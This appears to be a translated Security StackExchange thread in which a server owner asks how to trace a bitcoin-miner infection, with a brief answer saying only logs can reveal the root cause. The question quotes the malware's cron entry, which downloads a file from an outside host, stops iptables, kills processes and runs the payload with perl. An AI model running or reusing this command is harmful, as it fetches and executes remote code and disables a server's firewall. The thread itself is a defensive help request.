我安装了Clamav和rootkits探测器,他们什么也没发现。
病毒运行了一些进程,名为模块,吃cpu,我的服务器供应商告诉我,这是比特币矿工病毒,但他们没有给我任何其他信息。我发现的唯一一件事就是这个职位:
* * * * * curl -o /tmp/.selfish http://royaltyhomeins.com/.god;/sbin/service iptables stop;wget -O /tmp/.selfish http://royaltyhomeins.com/.god;killall -9 perl;killall -9 packet;perl /tmp/.selfish;rm -rf /tmp/.selfish我把所有的过程都杀了,把那件事去掉了。/tmp文件夹为空。问题是我没有找到核心的“问题”。我还能做什么?
发布于 2017-01-09 11:41:26
从您所说的,很难判断服务器是通过您的web应用程序/站点,还是通过一些过时的软件或其他方式被入侵的,但是有些事情您可以尝试:
但基本上只有日志文件才能找出根本原因。其他方法可以识别漏洞,但在这种情况下无法判断攻击者是否使用了这些漏洞。
https://security.stackexchange.com/questions/147752
复制相似问题